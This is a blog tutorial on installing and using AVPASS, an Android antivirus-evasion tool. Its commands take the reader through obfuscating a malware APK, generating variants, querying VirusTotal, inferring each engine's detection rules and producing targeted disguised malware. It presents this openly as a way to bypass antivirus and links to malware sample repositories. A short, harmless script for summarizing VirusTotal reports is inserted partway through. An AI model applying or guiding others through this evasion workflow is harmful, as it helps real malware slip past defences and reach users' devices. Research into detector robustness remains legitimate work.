AVPASS – All things in moderation

AVPASS

Last week, I learned about a good tool for bypassing antivirus on Android. Today, I will introduce you to that tool.
It is avpass.

What is avpass?
AVPASS is a tool for leaking the detection model of Android malware detection systems (i.e., antivirus software), and bypassing their detection logic by using the leaked information coupled with APK obfuscation techniques. AVPASS is not limited to the detection features used by detection systems; it can also infer detection rules, so that it can disguise any Android malware as a benign application by automatically transforming the APK binary. To prevent leakage of the application logic during transformation, AVPASS provides an Imitation Mode that allows malware developers to safely query the detection features they are curious about without sending the entire binary.

AVPASS offers several useful features to transform any Android malware so it can bypass anti-virus software. Below are the main features AVPASS offers:
– APK obfuscation with more than 10 modules
– Feature inference for the detection system by using individual obfuscation
– Rule inference of the detection system by using the 2k factorial experiment
– Targeted obfuscation to bypass a specific detection system
– Safe query support by using Imitation Mode

Install avpass
On Ubuntu 16.04 LTS
Download avpass:
Use git:

$ git clone https://github.com/sslab-gatech/avpass.git

$ cd avpass

Install avpass with command:

$ ./install-dep.sh

If the file is not executable, run this command first:

$ sudo chmod +x ./install-dep.sh

If this script doesn’t work for your environment and you find any problem regarding a library, you can install these libraries manually. Don’t worry; we didn’t use many libraries. This is the list:
– apktool: https://ibotpeaches.github.io/Apktool/
– numpy: http://www.numpy.org/
– PIL: http://www.pythonware.com/products/pil/
– magic: https://pypi.python.org/pypi/python-magic
– python-utils: https://pypi.python.org/pypi/python-utils/2.1.0
– vt: https://pypi.python.org/pypi/virustotal-api

We recommend making sure that two tools (apktool and vt) are working correctly. If you execute these commands with no arguments, you should see each tool’s usage message.

$ apktool

$ vt

Let’s start by obfuscating an individual APK. First you need to set up your obfuscation. If you don’t want to, you can simply use the default obfuscations, which include only Java reflection, string encryption, variable encryption, package name change, method name change, class name change, and resource obfuscation.
Open the file: src/conf.py
I use nano. You can use nano or vim.

$ cd src
$ sudo nano conf.py

# DEFINED COMMAND: preserve original functionality
STRING         = "python strp.py -f {1}.apk string -c no;"
VARIABLE       = "python strp.py -f {1}.apk variable -c no;"
PCM            = "python pcm.py  -f {1}.apk package -c no;"
BYTECODE       = "python pcm.py  -f {1}.apk insbyte -c no;"
BENIGN_CLASS   = "python pcm.py  -f {1}.apk bclass -c no;"
RESOURCE_IMAGE = "python res.py  -f {1} image -c no;"
RESOURCE_XML   = "python res.py  -f {1} resxml -c no -n no;"
API_INTER      = "python api.py  -f {1}.apk inter -a android -c no;"
BEN_PERMISSION = "python api.py  -f {1}.apk bpermission -c no;"
API_REFLECTION = "python refl.py -f {1}.apk reflect -c no;"

ANTI_DATAFLOW  = "WILL RELEASE AFTER ACADEMIC SUBMISSION PROCESS"
COMPONENT_DIV  = "WILL RELEASE AFTER ACADEMIC SUBMISSION PROCESS"
FAMILY_CHANGER = "WILL RELEASE AFTER ACADEMIC SUBMISSION PROCESS"


# DESTRUCTIVE OBFUSCATIONS: only for inferring feature's impact
RM_RESOURCE_PAYLOAD = "python res.py   -f {1} payload -c no;"
RM_APIS             = "python rmapi.py -f {1}.apk rmall -c no;"
RM_PERMISSION       = "python api.py   -f {1}.apk permission -c no;"


# Obfuscation Group for individual APK disguise
OBFUSCATION_LIST = [API_REFLECTION, STRING, VARIABLE, PCM, \
                   RESOURCE_IMAGE+RESOURCE_XML]


# Inferring Group
INFERRING_LIST  = [API_REFLECTION, STRING, VARIABLE, PCM, BENIGN_CLASS, \
                   RESOURCE_IMAGE+RESOURCE_XML, RM_PERMISSION]

We pre-defined several obfuscation modules here. You can modify OBFUSCATION_LIST for your obfuscation. Note that the order of the list is the order in which the obfuscations are applied. For example, this configuration will start obfuscation with Java reflection.

Obfuscate individual APK
Let’s test with an example. Copy any malware sample into your src directory. Then run this script:

# generate one individual obfuscated APK
$ python gen_disguise.py -i YOUR_MALWARE.apk individual

Before:

After:

Check your obfuscated APK against VirusTotal.
Upload the obfuscated APK:

$ vt -f YOUR_MALWARE.apk -j

Check the result:

$ vt -fs YOUR_MALWARE.apk -j

Finally, you will get a result file (JSON format) and can check which AV engines detected your obfuscated APK.
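The result file can be summarized without reading the raw JSON by hand. The following script is an added example, not part of avpass or the vt tool; it assumes the file uses the VirusTotal API v2 file-report layout (a top-level `scans` map and a `response_code`), and the embedded report is a constructed sample with made-up engine names.

```python
import json

# Constructed sample in the VirusTotal API v2 file-report layout that the
# `vt -fs ... -j` step writes. Engine names and verdicts are made up.
SAMPLE_REPORT = {
    "response_code": 1,
    "resource": "<sha256 placeholder>",
    "positives": 2,
    "total": 4,
    "scans": {
        "EngineA": {"detected": True, "result": "Android.Trojan.Generic"},
        "EngineB": {"detected": False, "result": None},
        "EngineC": {"detected": True, "result": "Andr/Agent-XYZ"},
        "EngineD": {"detected": False, "result": None},
    },
}


def summarize_report(report):
    """Return (detecting_engines, positives, total) for one v2 file report.

    response_code != 1 means VirusTotal has no verdict yet (the upload is
    still queued or the hash is unknown), so None is returned instead of a
    misleading 0/0 count.
    """
    if report.get("response_code") != 1:
        return None
    scans = report.get("scans", {})
    # Recount from the per-engine entries instead of trusting "positives".
    hits = sorted(name for name, scan in scans.items() if scan.get("detected"))
    return hits, len(hits), len(scans)


def detection_rate(report):
    """Fraction of engines that flagged the sample, or None if no verdict."""
    summary = summarize_report(report)
    if summary is None or summary[2] == 0:
        return None
    return summary[1] / summary[2]


def load_summary(path):
    """Load a JSON result file written by vt and summarize it."""
    with open(path) as fh:
        return summarize_report(json.load(fh))


if __name__ == "__main__":
    hits, positives, total = summarize_report(SAMPLE_REPORT)
    print("%d/%d engines detected: %s" % (positives, total, ", ".join(hits)))
```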

Generate malware variation
Setup

First, make input and output directories and copy your malware into the input directory. Check your conf.py to include or exclude the necessary obfuscations; in particular, modify INFERRING_LIST to define your obfuscation. Then execute the gen_variations.py script. For example:

$ cd src
$ mkdir input
$ mkdir output

# modify your conf.py

$ cp YOUR_MALWARE ./input/
$ python gen_variations.py -i input -o output

Input:

Output:

You can download malware samples from:
DREBIN: https://www.sec.cs.tu-bs.de/~danarp/drebin/
VirusShare: https://virusshare.com/

Query to VirusTotal
Did you finish variation generation? If yes, you can query the variations to VirusTotal. Since AVPASS learns which obfuscations were applied by reading the filename, you should not rename the obfuscated files. You can use these commands to query and get the result.

# upload your APK
$ vt -f *.apk -j

After uploading all APKs:

# download queried result
$ vt -fs *.apk -j

Inferring AV’s rules
Assumptions
1. You have generated malware variations and queried the results from VirusTotal
2. The malware variations (APK) and the queried results (JSON) are in the same directory

Once you have finished querying, inferring is simple! Run this script. Please make sure you satisfy the assumptions above before running it.

# infer rules, assume that output directory has both APK and JSON
$ python infer_rules.py -i output

What can you see? You will see the inferred rule combinations for each AV, and you can also check that inferred_rules.pkl has been generated.

Obfuscate by using inferred rules
You can do targeted obfuscation using this command:

# Run targeted obfuscation
$ sudo python gen_disguise.py -i YOUR_MALWARE withrule -o OUTPUT_DIR

If there is no problem so far, you will see a question prompt on the command line.

You can start to install and use the features of avpass. Hope my article will help you. Please comment if there are any errors during your installation. Thank you!

Reference: https://github.com
